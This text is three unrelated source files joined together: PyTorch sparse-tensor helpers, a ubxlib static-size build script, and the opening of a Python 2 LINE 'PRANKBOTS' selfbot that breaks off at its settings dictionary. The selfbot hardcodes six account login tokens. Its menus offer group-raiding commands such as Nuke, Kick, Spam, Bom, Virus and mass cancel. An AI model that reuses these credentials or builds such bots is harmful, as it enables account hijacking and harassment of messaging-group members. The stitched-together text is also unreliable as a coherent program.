output.features = torch.cat([i.features for i in input], 1)
return output
def add_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
output.features = sum([i.features for i in input])
return output
def append_tensors(tensors):
spatial_size=tensors[0].spatial_size
dimension=len(spatial_size)
x=SparseConvNetTensor(
features=torch.cat([t.features for t in tensors],0),
metadata=Metadata(dimension),
spatial_size=spatial_size)
for t in tensors:
x.metadata.appendMetadata(t.metadata,spatial_size)
return x
class AddCoords(torch.nn.Module):
def forward(self, input):
output = SparseConvNetTensor()
if input.features.numel():
with torch.no_grad():
coords = input.get_spatial_locations()
d = (input.spatial_size.type_as(input.features)-1)/2
coords=coords[:,:-1].type_as(input.features)/ d[None,:] - 1
output.features = torch.cat([input.features,coords],1)
else:
output.features = input.features
output.metadata = input.metadata
output.spatial_size = input.spatial_size
return output
def compare_sparse(x, y):
cL,cR,L,R = x.metadata.compareSparseHelper(y.metadata, x.spatial_size)
if x.features.is_cuda:
cL=cL.cuda()
cR=cR.cuda()
L=L.cuda()
R=R.cuda()
e = 0
if cL.numel():
e += (x.features[cL]-y.features[cR]).pow(2).sum()
if L.numel():
e += x.features[L].pow(2).sum()
if R.numel():
e += y.features[R].pow(2).sum()
return e / (cL.numel() + L.numel() + R.numel())
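# compare_sparse returns the mean squared difference over the union of
# active sites: cL/cR index sites active in both tensors, while L and R
# index sites active in only one (compared against an implicit zero).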
def spectral_norm_svd(module):
w=module.weight
if w.ndimension()==3:
w=w.view(-1,w.size(2))
_,s,_=torch.svd(w)
return s[0]
def pad_with_batch_idx(x,idx): #add a batch index to the list of coordinates
return torch.cat([x,torch.LongTensor(x.size(0),1).fill_(idx)],1)
def batch_location_tensors(location_tensors):
a=[]
for batch_idx, lt in enumerate(location_tensors):
if lt.numel():
a.append(pad_with_batch_idx(lt,batch_idx))
return torch.cat(a,0)
def prepare_BLInput(l,f):
with torch.no_grad():
n=max([x.size(0) for x in l])
L=torch.empty(len(l),n,l[0].size(1)).fill_(-1)
F=torch.zeros(len(l),n,f[0].size(1))
for i, (ll, ff) in enumerate(zip(l,f)):
L[i,:ll.size(0),:].copy_(ll)
F[i,:ff.size(0),:].copy_(ff)
return (L,F)
def checkpoint_restore(model,exp_name,name2,use_cuda=True,epoch=0):
if use_cuda:
model.cpu()
if epoch>0:
f=exp_name+'-%09d-'%epoch+name2+'.pth'
assert os.path.isfile(f)
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
else:
f=sorted(glob.glob(exp_name+'-*-'+name2+'.pth'))
if len(f)>0:
f=f[-1]
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
epoch=int(f[len(exp_name)+1:-len(name2)-5])
if use_cuda:
model.cuda()
return epoch+1
def is_power2(num):
return num != 0 and ((num & (num - 1)) == 0)
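# e.g. is_power2(64) -> True, is_power2(96) -> False, is_power2(0) -> False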
def has_only_one_nonzero_digit(num): #https://oeis.org/A037124
return num != 0 and (num/10**math.floor(math.log(num,10))).is_integer()
def checkpoint_save(model,exp_name,name2,epoch, use_cuda=True):
f=exp_name+'-%09d-'%epoch+name2+'.pth'
model.cpu()
torch.save(model.state_dict(),f)
if use_cuda:
model.cuda()
#remove previous checkpoints unless they are a power of 2 to save disk space
epoch=epoch-1
f=exp_name+'-%09d-'%epoch+name2+'.pth'
if os.path.isfile(f):
if not is_power2(epoch):
os.remove(f)
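# e.g. exp_name='scn', name2='unet', epoch=32 (hypothetical values) saves
# 'scn-000000032-unet.pth' and removes 'scn-000000031-unet.pth', since 31
# is not a power of two.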
def random_rotation(dimension=3):
return torch.qr(torch.randn(dimension,dimension))[0]
class LayerNormLeakyReLU(torch.nn.Module):
def __init__(self,num_features,leakiness):
torch.nn.Module.__init__(self)
self.leakiness=leakiness
self.in1d=torch.nn.LayerNorm(num_features)
def forward(self,x):
if x.features.numel():
x.features=self.in1d(x.features)
x.features=torch.nn.functional.leaky_relu(x.features,self.leakiness,inplace=True)
return x
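# voxelize_pointcloud (below): truncates xyz to integer voxel coordinates,
# merges duplicate voxels via np.unique, and averages the rgb features of
# all points that fell into the same voxel (index_add_ then divide by counts).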
def voxelize_pointcloud(xyz,rgb):
xyz,inv,counts=np.unique(xyz.long().numpy(),axis=0,return_inverse=True,return_counts=True)
xyz=torch.from_numpy(xyz)
inv=torch.from_numpy(inv)
rgb_out=torch.zeros(xyz.size(0),rgb.size(1),dtype=torch.float32)
rgb_out.index_add_(0,inv,rgb)
return xyz, rgb_out/torch.from_numpy(counts[:,None]).float()
|
static_size.py
|
#!/usr/bin/env python
'''Build the platform independent, non-test related code of ubxlib to establish static sizes.'''
from multiprocessing import Process, freeze_support # Needed to make Windows behave
# when run under multiprocessing,
from signal import signal, SIGINT # For CTRL-C handling
from time import time, sleep
import os
import sys # For exit() and stdout
import argparse
import subprocess
import psutil # For killing things (make sure to do pip install psutil)
import platform # Figure out current OS
# Expected name for compiler
GNU_COMPILER = "arm-none-eabi-gcc"
# Expected name for linker
GNU_LINKER = "arm-none-eabi-gcc"
# Expected name for size
GNU_SIZE = "arm-none-eabi-size"
# The guard time in seconds for each compilation
# This may seem quite large: the reason is that this script
# can sometimes be run on a *very* heavily loaded test
# machine which can take considerable time finding the
# CPU and memory needed to launch a process
GUARD_TIME_SECONDS = 120
# Sub-directory to use when building
BUILD_SUBDIR = "build"
def signal_handler(sig, frame):
'''CTRL-C Handler'''
del sig
del frame
sys.stdout.write('\n')
print("CTRL-C received, EXITING.")
sys.exit(-1)
def get_flags(string, name):
'''Get CFLAGS or LDFLAGS as a list from str or the environment'''
answer_list = []
if not string and name in os.environ:
string = os.environ[name]
if string:
answer_list = string.split(" ")
return answer_list
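# e.g. get_flags("-Os -g0", "CFLAGS") -> ['-Os', '-g0']; when string is
# empty the value is taken from os.environ["CFLAGS"] instead, if present.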
def read_list_from_file(file):
'''Read a list, line by line, from a file'''
output_list = []
# Read list
temp_list = [line.strip() for line in open(file, 'r')]
for item in temp_list:
# Throw away comment lines
item = item.strip()
if item and not item.startswith("#"):
output_list.append(item)
return output_list
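# Example input file (illustrative paths, not shipped with this script):
#   # core sources
#   port/u_port.c
#   common/u_common.c
# yields ['port/u_port.c', 'common/u_common.c'].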
def exe_terminate(process_pid):
'''Jonathan's killer'''
process = psutil.Process(process_pid)
for proc in process.children(recursive=True):
proc.terminate()
process.terminate()
# subprocess arguments behaves a little differently on Linux and Windows
# depending if a shell is used or not, which can be read here:
# https://stackoverflow.com/a/15109975
# This function will compensate for these deviations
def subprocess_osify(cmd, shell=True):
''' expects an array of strings being [command, param, ...] '''
if platform.system() == "Linux" and shell:
line = ''
for c in cmd:
# Put everything in a single string and quote args containing spaces
if ' ' in c:
line += '\"{}\" '.format(c)
else:
line += '{} '.format(c)
cmd = line
return cmd
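# e.g. ['gcc', '-I', 'my dir'] becomes the single string 'gcc -I "my dir" '
# on Linux when shell is True, and is returned unchanged otherwise.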
def exe_run(call_list, guard_time_seconds, shell_cmd=False):
'''Call an executable, printing out what it does'''
success = False
start_time = time()
kill_time = None
try:
popen_keywords = {
'stdout': subprocess.PIPE,
'stderr': subprocess.STDOUT,
'shell': shell_cmd
}
process = subprocess.Popen(subprocess_osify(call_list, shell=shell_cmd),
**popen_keywords)
while process.poll() is None:
string = process.stdout.readline()
if string:
print("{}".format(string.decode()), end="")
if guard_time_seconds and (kill_time is None) and \
(time() - start_time > guard_time_seconds):
kill_time = time()
print("guard time of {} second(s)." \
" expired, stopping {}...".
format(guard_time_seconds, call_list[0]))
exe_terminate(process.pid)
if (process.poll() == 0) and kill_time is None:
success = True
except ValueError as ex:
print("failed: {} while trying to execute {}.". \
format(type(ex).__name__, str(ex)))
return success
# Note: we don't bother with make here as there are few files,
# this is usually run as part of automated testing where a
# clean build is required anyway and make can be a bit funny
# about platform differences for if/when we want to run this
# on Linux
def build(source_list, include_list, cflag_list, ldflag_list, gcc_bin_dir):
'''Build source_list with include_list and flags under GCC'''
return_value = 0
obj_list = []
# Make the include list
for idx, item in enumerate(include_list):
include_list[idx] = "-I" + item
# Compile all the source files
for item in source_list:
call_list = [gcc_bin_dir + os.sep + GNU_COMPILER]
call_list.extend(include_list)
call_list.extend(cflag_list)
call_list.append("-c")
call_list.append(item)
# Print what we're gonna do
tmp = ""
for another_item in call_list:
tmp += " " + another_item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
# Relax a little between files to let others in
sleep(0.1)
if return_value == 0:
# Now link them
for file in source_list:
parts = file.split("/")
file = parts[len(parts) - 1]
file = file.replace(".cpp", ".o")
file = file.replace(".c", ".o")
obj_list.append(file)
call_list = [gcc_bin_dir + os.sep + GNU_LINKER]
call_list.extend(obj_list)
# Order is important: has to be after the object
# list or libraries (e.g. -lm) might not be resolved
call_list.extend(ldflag_list)
call_list.append("-o")
call_list.append("total_with_clib.elf")
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
if return_value == 0:
# Call size on the result
call_list = [gcc_bin_dir + os.sep + GNU_SIZE]
call_list.append("-G")
call_list.extend(obj_list)
call_list.append("total_with_clib.elf")
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
print("{}".format(tmp))
if not exe_run(call_list, GUARD_TIME_SECONDS, True):
return_value = -1
return return_value
def main(source_files, include_paths, cflags, ldflags, gcc_bin_dir,
ubxlib_dir, working_dir):
'''Main as a function'''
return_value = 1
saved_path = None
cflag_list = []
ldflag_list = []
test_call = []
signal(SIGINT, signal_handler)
# Print out what we've been told to do
text = "compiling list of files from \"" + source_files + "\"" \
" with list of include paths from \"" + include_paths + "\""
if cflags:
text += ", with CFLAGS \"" + cflags + "\""
else:
text +=", with CFLAGS from the environment"
if ldflags:
text += ", with LDFLAGS \"" + ldflags + "\""
else:
text +=", with LDLAGS from the environment"
if gcc_bin_dir:
text += ", with GCC from \"" + gcc_bin_dir + "\""
else:
text +=", with GCC on the PATH"
if ubxlib_dir:
text += ", ubxlib directory \"" + ubxlib_dir + "\""
if working_dir:
text += ", working directory \"" + working_dir + "\""
print("{}.".format(text))
# Read the source files and include paths
source_list = read_list_from_file(source_files)
include_list = read_list_from_file(include_paths)
if ubxlib_dir:
# Prepend ubxlib to them
for idx, item in enumerate(source_list):
source_list[idx] = ubxlib_dir + os.sep + item
for idx, item in enumerate(include_list):
include_list[idx] = ubxlib_dir + os.sep + item
cflag_list = get_flags(cflags, "CFLAGS")
ldflag_list = get_flags(ldflags, "LDFLAGS")
saved_path = os.getcwd()
if working_dir:
os.chdir(working_dir)
else:
if not os.path.isdir(BUILD_SUBDIR):
os.mkdir(BUILD_SUBDIR)
os.chdir(BUILD_SUBDIR)
# Check that the compiler can be found
print("checking that GCC is installed...")
if gcc_bin_dir:
test_call.append(gcc_bin_dir + os.sep + GNU_COMPILER)
test_call.append("--version")
if exe_run(test_call, GUARD_TIME_SECONDS, True):
# Do the build
return_value = build(source_list, include_list, cflag_list,
ldflag_list, gcc_bin_dir)
else:
print("unable to run GCC.\n")
if saved_path:
os.chdir(saved_path)
return return_value
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(description="A script to" \
" build a list of files" \
" with a given GCC compiler;" \
" if the compiler is not on" \
" the path it can be" \
" supplied as a command-line" \
" parameter. The following" \
" environment variables" \
" affect operation:\n" \
" CFLAGS will be passed to" \
" the compiler unless the" \
" command-line parameter -c" \
" is provided,\n" \
" LDFLAGS will be passed to" \
" the linker unless the" \
" command-line parameter -l" \
" is provided.\n")
PARSER.add_argument("-p", help="path to the bin directory of" \
" GCC, e.g. \"C:/Program Files (x86)/GNU" \
" Arm Embedded Toolchain/10 2020-q4-major/bin\"")
PARSER.add_argument("-c", help="flags to be passed to the" \
" compiler, e.g. \"-Os -g0 -mcpu=cortex-m4"\
" -mfloat-abi=hard -mfpu=fpv4-sp-d16" \
" -DU_CFG_APP_PIN_CELL_ENABLE_POWER=-1" \
" -DMY_FLAG -DMY_STRING=thisisastring\".")
PARSER.add_argument("-l", help="flags to be passed to the" \
" linker, e.g. \"-Os -g0 -mcpu=cortex-m4" \
" -mfloat-abi=hard -mfpu=fpv4-sp-d16" \
" --specs=nano.specs -lc -lnosys -lm\".")
PARSER.add_argument("-u", help="the root directory of ubxlib.")
PARSER.add_argument("-w", help="an empty working directory to" \
" use; if none is given \"" + BUILD_SUBDIR + \
"\" will be created and used.")
PARSER.add_argument("source", nargs="?", default="source.txt", \
help="a file containing the list of source"\
" files to compile, each on a single line.")
PARSER.add_argument("include", nargs="?", default="include.txt",\
help="a file containing the list of include"\
" paths required to compile the source," \
" each on a single line.")
ARGS = PARSER.parse_args()
# freeze_support() is required because Windows needs it in order to
# behave when this module is called during multiprocessing, see
# https://docs.python.org/2/library/multiprocessing.html#windows
freeze_support()
# Call main()
RETURN_VALUE = main(ARGS.source, ARGS.include, ARGS.c, ARGS.l,
ARGS.p, ARGS.u, ARGS.w)
sys.exit(RETURN_VALUE)
|
acilPB[1].py
|
# -*- coding: utf-8 -*-
import PRANKBOTS
from PRANKBOTS.lib.curve.ttypes import *
from datetime import datetime
import io,os,re,ast,six,sys,glob,json,time,timeit,codecs,random,shutil,urllib,urllib2,urllib3,goslate,html5lib,requests,threading,wikipedia,subprocess,googletrans
from gtts import gTTS
from random import randint
from time import sleep
from urllib import urlopen, urlretrieve, urlencode
from io import StringIO
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
if (six.PY2):
import urllib2
import urllib
else:
import urllib.request
import urllib.parse
acil = PRANKBOTS.LINE()
acil.login(token="ErYWjY9YV79Z38JKxKo3.Zyqdf0szEvhn7GgnUvgUOW.UjX05iErsgigbASwAmC2c+XpFJ6lR5Tz3fa/+/Zf6bk=")
acil.loginResult()
ki = PRANKBOTS.LINE()
ki.login(token="EriNWY115rLz2hdl48v6.AtUxbv5bm36lwyvJZPmvLG.oLcFDSxUslenk2Rz2XQg1E/dUM90SsPowtl3mIsCh+w=")
ki.loginResult()
ki2= PRANKBOTS.LINE()
ki2.login(token="ErnJswlRxEo8wSuOebF3.MH2J3w8lfsAoWo4z8qxeuW.pmKfHC0OdXbZY5pUV/Ruyu1NohldbTi/nfmPsBzMvds=")
ki2.loginResult()
ki3 = PRANKBOTS.LINE()
ki3.login(token="ErkFmsynownacQGE3XDf.pMI0m8HrhHEeXjG/H6SepW.yLA1mS6JHgxa7qZzjVQ5JbbB3UFJPR0b4nxCbMc6qLY=")
ki3.loginResult()
ki4 = PRANKBOTS.LINE()
ki4.login(token="Er8h61l1jTFFUVf3e13a.NSj60VJy3+WTBIuVnvXHwG.wkwr4TT7v1FWJv4KfHc/Q2yDXxx7deHxXvq65XHjCJg=")
ki4.loginResult()
ki5 = PRANKBOTS.LINE()
ki5.login(token="ErzbXhPnCAsXlc6MA7i3.duo4C3Drdvi2rzJhZXuAaW.mkuqhMhfYByBeUBHcwNeGwpTRoaBxBFv5pSbT/yqcMo=")
ki5.loginResult()
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║1║ ✰ Me
║2║ ✰ Add
║3║ ✰ Gift
║4║ ✰ Spam gift️
║5║ ✰ Cn "text"
║6║ ✰ Clockname "text"
║7║ ✰ TL:"text"
║8║ ✰ Ban:"mid"
║9║ ✰ Unban:"mid"
║10║ ✰ Bl:on
║11║ ✰ Unbl:on
║12║ ✰ Mcheck
║13║ ✰ Mybio:
║14║ ✰ Mybots
║15║ ✰ Mymid
║16║ ✰ Mygroups
║17║ ✰ Group id
║18║ ✰ Message set:"text"
║19║ ✰ Message confirm
║20║ ✰ Msg add-"text"
║21║ ✰ Com set:"text"
║22║ ✰ Comment
║23║ ✰ Comban/del/cek
║24║ ✰ Help set:"text"
║25║ ✰ Change
║26║ ✰ Gn "text"
║27║ ✰ Clink/Curl
║28║ ✰ Kick:"mid"
║29║ ✰ Invite:"mid"
║30║ ✰ Creator
║31║ ✰ Gcancel:"jumlah"
║32║ ✰ Gcancelall
║33║ ✰ Ginfo
║34║ ✰ Check
║35║ ✰ Cctv
║36║ ✰ Glink
║37║ ✰ Spam on/off
║38║ ✰ Gurl
║39║ ✰ Clink
║40║ ✰ Blocklist
║41║ ✰ Banlist
║42║ ✰ Update
║43║ ✰ Creator
║44║ ✰ Sc:"mid"
║45║ ✰ Ban "@"
║46║ ✰ Unban "@"
║47║ ✰ Sc @
║48║ ✰ Nuke
║49║ ✰ Backup
║50║ ✰ Tagall
║51║ ✰ Kick@mbl
║52║ ✰ Reinvite
║53║ ✰ Conban
║54║ ✰ Clearban
║55║ ✰ Gid
║56║ ✰ Grupname
║57║ ✰ Lurk:on/off
║58║ ✰ Lurkers
║59║ ✰ Wc️
║60║ ✰ Sp
║61║ ✰ stafflist
║62║ ✰ Reboot
║63║ ✰ Leaveallgroup
║64║ ✰ Pmfavorite
║65║ ✰ Broken
║╩═══NEXT PAGE═══╦
║║ ✰ Allprotect:on/off
║║ ✰ Admin:add @
║║ ✰ Admin:del @
║║ ✰ Adminlist/Listadmin
║╩═══NEXT PAGE═══╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩════════╝
"""
helpMessage1="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╩═ADMIN+OWNER═╦
║1║ ✰ Me
║2║ ✰ Smule
║3║ ✰ Google
║4║ ✰ Getinfo @
║5║ ✰ Getbio @
║6║ ✰ Getprofile @
║7║ ✰ Twitter
║8║ ✰ Playstore
║9║ ✰ Respon
║10║ ✰ Getvid @
║11║ ✰ Getcontact @
║12║ ✰ Getname @
║13║ ✰ Mybio
║14║✰ Myname
║15║ ✰ Mypict
║16║✰ Myvid
║17║ ✰ Mycover
║18║ ✰ Urlcover
║19║ ✰ Urlpict/picturl
║20║ ✰ Getmid @
║21║ ✰ Youinfo @
║22║ ✰ Say
║23║ ✰ Tagall
║24║ ✰ Github
║25║ ✰ Wc
║26║ ✰ Wikipedia
║27║ ✰ Xvideo
║28║ ✰ Picturl @
║29║ ✰ Coverurl @
║30║ ✰ Sider:on/off
║31║ ✰ Invite:user
║╩═══ADMIN═══╦
║║ ✰ { Media }
║║ ✰ { Set }
║║ ✰ {Helpbots}
║║ ✰ {Settings}
║║ ✰ {Setauto}
║║ ✰ Allprotect:on/off
║║ ✰ Admin:add @
║║ ✰ Admin:del @
║║ ✰ Adminlist/Listadmin
║║ ✰ Leaveallgroup
║║ ✰ Botallbye
║║ ✰ Sendgroup *txt
║║ ✰ Sendcontact *txt
║║ ✰ Sendpm *txt
║║ ✰ Virus
╚══╩═══════╝
"""
helpMedia="""(╣••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╦═══MEDIA═══
║1║ ✰ Youtube *text*
║2║ ✰ Youtubesearch *user*
║3║ ✰ Audio "text"
║4║ ✰ Lirik "text"
║5║ ✰ Ig "name"
║5║ ✰ Tts "judul/nama band"
║6║ ✰ Gimage
║7║ ✰ Image *text*
║8║ ✰ google *text*
║9║ ✰ Micadd @
║10║ ✰ Micdel @
║11║ ✰ Miclist
║12║ ✰ Picturl @
║13║ ✰ Coverurl @
║14║ ✰ Copy @
║15║ ✰ Getname @
║16║ ✰ Getinfo @
║17║ ✰ pict @️
║18║ ✰ Getcontact @
║19║ ✰ Getvid @
║20║ ✰ Getmid @
║21║ ✰ Copy @
║22║ ✰ Recopy
║23║ ✰ Getcover @
║24║ ✰ Getbio @
║25║ ✰ Getinfo @
║26║ ✰ youinfo @
║27║ ✰ info "mid"
║28║ ✰ Contact "mid"
║29║ ✰ Id "idline"
║30║ ✰ Memlist
║31║ ✰ Setimage:
║32║ ✰ Papimage
║33║ ✰ Setvideo:
║34║ ✰ Papvideo
║35║ ✰ Checkdate
║36║ ✰ Myname
║37║ ✰ Mybio
║38║ ✰ Mypict
║39║ ✰ Myvid
║40║ ✰ Urlpict
║41║ ✰ Mycover
║42║ ✰ Urlcover
║43║ ✰ Hay "text"
║44║ ✰ Record "text"
║45║ ✰ Xvideo "text"
║46║ ✰ Cmule "id smule"
║47║ ✰ Time
║48║ ✰ Imagetxt "text"
║49║ ✰ Cuaca*txt
║50║ ✰ Lokasi*txt
║51║ ✰ Shalat*txt
║52║ ✰ Anime"text"
║53║ ✰ Cekmovie"text"
║54║ ✰ Video"text"
║55║ ✰ Playstore"txt"
║56║ ✰ Twitter*txt
║57║ ✰ Klip"text"
║58║✰ Github*txt
║59║✰ facebook*txt
║60║✰ Wikipedia*txt
║61║✰ Checkdate*ttl
║62║✰ Vikur
║╩══BROADCAST═══
║📩║ ✰ sendpm "text"
║📨║ ✰ sendgrup "text"
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
helpFun = """(╣℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́╣)
╔═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╗
║╦═══MEDIA═══
║1║ ✰ sider:*txt*
║2║ ✰ tagme:*txt
║3║ ✰ welcome:*txt
║4║ ✰ left:*txt
║5║ ✰ message set:*txt*
║6║ ✰ STKID:*sticker id
║7║ ✰ STKPKGID:*stkr gid
║8║ ✰ STKVER:*version
║9║ ✰ cekresponse
║╩══NEXT PAGE══╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
helpself="""
╔╦═C༘֮֮O༘֮֮M༘֮֮M༘֮֮A༘֮֮N༘֮֮D༘֮֮ ֮A༘֮֮L༘֮֮L༘֮֮ ֮B༘֮֮O༘֮֮T༘֮֮S༘֮֮═╦╗
║ ═══════════║
║1║ ✰ Fuck1/10 "@"
║2║ ✰ Kick1/10 "@"
║3║ ✰ All mid
║4║ ✰ Reinvite
║5║ ✰ B1-10 mid
║6║ ✰ B1-10name "text"
║7║ ✰ B1-10
║8║ ✰ B1-10 gift
║9║ ✰ B1-10 in
║10║ ✰ B1-10 bye
║11║ ✰ Bc "text"
║12║ ✰ Say "text"
║13║ ✰ Bom "text"
║14║ ✰ Allgift
║15║ ✰ Spam gift️
║16║ ✰ Botcopy
║18║ ✰ Botbackup
║19║ ✰ Botpict
║20║ ✰ Botcover
║21║ ✰ Botak
║22║ ✰ Allname "nama"
║23║ ✰ Allbio "status"
║24║ ✰ Sendcontact "text"
║25║ ✰ Botbyeall
║••℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́••
╚═══════════╝
"""
helpset="""╔(╣ S༘̏̏Ȅ༘̏T༘̏̏T༘̏̏Ȉ༘̏N༘̏̏G༘̏̏ ̏B༘̏̏Ȍ༘̏T༘̏̏S༘̏̏.╣)╗
║ ✰ Ban:on/Unbl:on
║ ✰ Contact:on/off
║ ✰ Add:on/off
║ ✰ Join:on/off
║ ✰ Leave:on/off
║ ✰ Share:on/off
║ ✰ Com:on/off
║ ✰ Clock:on/off
║ ✰ Respon:on/off
║ ✰ Stickertag:on/off
║ ✰ Welcome:on/off
║ ✰ Left:on/off
║ ✰ Sider:on/off
║ ✰ Notag:on/off
║ ✰ Mimic on/off
║ ✰ Simsimi:on/off
║ ✰ Read:0n/off
║ ✰ Like:on/off
║ ✰ Runtime
║═(╣S̰֮֮Ḛ֮֮T̰֮֮T̰֮֮Ḭ֮֮N̰֮֮G̰֮֮ ֮G̰֮֮R̰֮֮O̰֮֮Ṵ֮֮P̰֮֮S̰֮֮╣)═
║ ★ Pro:on/off
║ ★ Prolink:on/off
║ ★ Proinvite:on/off
║ ★ Procancel:on/off
║ ★ Namelock:on/off
║ ★ Projoin:on/off
║ ★ Allprotect:on/off
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
║ ╦═B༘̈́̈́L༘̈́̈́Ä༘́̈́C༘̈́̈́K༘̈́̈́ ̈́Ö༘́̈́F༘̈́̈́ ̈́ G༘̈́̈́Ä༘́̈́M༘̈́̈́Ë༘́̈́R༘̈́̈́═╦
╚═•℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́•╝
"""
translateMessage ="""
╔══════════
║(╣℘̰̰̈́ґ̰̰̈́∂̰̰̈́η̰̰̈́к̰̰̈́ ̰в̰̰̈́❍̰̰̈́т̰̰̈́ѕ̰̰̈́╣)
║╔═════════
║══════════
║✰║ Afrika/
║✰║ Albanian/
║✰║ Arab/
║✰║ Armenian/
║✰║ Bengali/
║✰║ Catalan/
║✰║ Chinese/
║✰║ Croatian/
║✰║ Czech/
║✰║ Danish/
║✰║ Dutch/
║✰║ English/
║✰║ Australia/
║✰║ Uk/
║✰║ Us/
║✰║ Esperanto/
║✰║ Finnish/
║✰║ French/
║✰║ German/
║✰║ Greek/
║✰║ Hindi/
║✰║ Hungarian/
║✰║ Icelandic/
║✰║ Indonesia/
║✰║ Italia/
║✰║ Japanese/
║✰║ Khmer/
║✰║ Korean/
║✰║ Latin/
║✰║ Latvian/
║✰║ Macedonian/
║✰║ Malaysia/
║✰║ Norwegian/
║✰║ Polish/
║✰║ Portuguese/
║✰║ Romanian/
║✰║ Russian/
║✰║ Sarbian/
║✰║ Sinhala/
║✰║ Slovak/
║✰║ Spanish/
║✰║ Spain/
║✰║ Swadhili/
║✰║ Swedish/
║✰║ Tamil/
║✰║ Thai/
║✰║ Turki/
║✰║ Ukrainian/
║✰║ Vietnam/
║✰║ Welsh/
║╩═══NEXT PAGE═╦
║🃏║ ✰ { Media }
║🇲🇨║ ✰ {Translate}
║⚙️║ ✰ { Set }
║🏴║ ✰ {Helpbots}
║🔧║ ✰ {Settings}
║🔛║ ✰ {Setauto}
╚══╩══════╝
"""
KAC=[acil,ki,ki2,ki3,ki4,ki5]
mid = acil.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
Bots=[mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "ucd84031744997951cdee018db951aea3" # MID of the selfbot account
PRANKBOT = ["ufce863f62f40706c01fa4a3c3c4cb096"] # MID of the owner
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'tagme':"tag message has not been set",
'sider1':"sider message has not been set",
'joingc':"member-join message has not been set",
'leftgc':"member-left message has not been set",
"stickerMention":False,
'message':"""THANKS FOR ADDING ME\n\nSUBSCRIBE ME ON YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ""",
"lang":"JP",
"comment":"Thanks For Adding Me",
"comment1":"|======AUTO LIKE======|\n\nSUBSCRIBE ME ON YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ\n\nACCEPTING SELFBOT ORDERS, IF INTERESTED!\nFOR INFO CONTACT DIRECTLY\n\nID:::::http://line.me/ti/p/~adiputra.95",
"commentOn":False,
"likeOn":True,
"wcOn":True,
"leftOn":True,
"alwayRead":False,
"Removechat":False,
"detectMention":True,
"kickMention":False,
"cpp":True,
"steal":False,
'pap':{},
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"cNames":"",
"blacklist":{},
"ACIL":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"atjointicket":True,
"potoMention":{},
"prankName":True,
"Sider":{},
"cyduk":{},
"pname":{},
"pro_name":{},
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
